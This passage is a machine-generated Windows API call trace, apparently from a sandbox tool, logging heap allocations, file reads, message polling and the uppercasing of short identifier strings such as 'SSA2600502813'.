lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0xfe5, lpOverlapped=0x0) returned 1 [0210.192] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0210.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfe5) returned 0x2a9a940 [0210.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ee020 | out: hHeap=0x2af0000) returned 1 [0210.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfe5) returned 0x2a9b930 [0210.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a940 | out: hHeap=0x2af0000) returned 1 [0210.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.195] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfe5) returned 0x2a9a940 [0210.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a940 | out: hHeap=0x2af0000) returned 1 [0210.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.195] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0210.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0210.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0210.196] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0210.196] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0210.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0210.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a58 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfe5) returned 0x2a9a940 [0210.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0210.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0210.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfe5) returned 0x2a9c920 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0210.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0210.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0210.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0210.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0210.198] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0210.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0210.199] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0210.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0210.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0210.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0210.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0210.199] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0210.199] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0210.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0210.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0210.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0210.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0210.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0210.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0210.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.200] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0210.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0210.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0210.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.200] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0210.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0210.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0210.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0210.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0210.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.201] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0210.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0210.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0210.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0210.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0210.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.202] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0210.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0210.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0210.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0210.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0210.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0210.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0210.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0210.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0210.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.202] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0210.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0210.202] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0210.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa20 [0210.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0210.203] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0210.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0210.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0210.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0210.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0210.203] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0210.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0210.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0210.203] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, 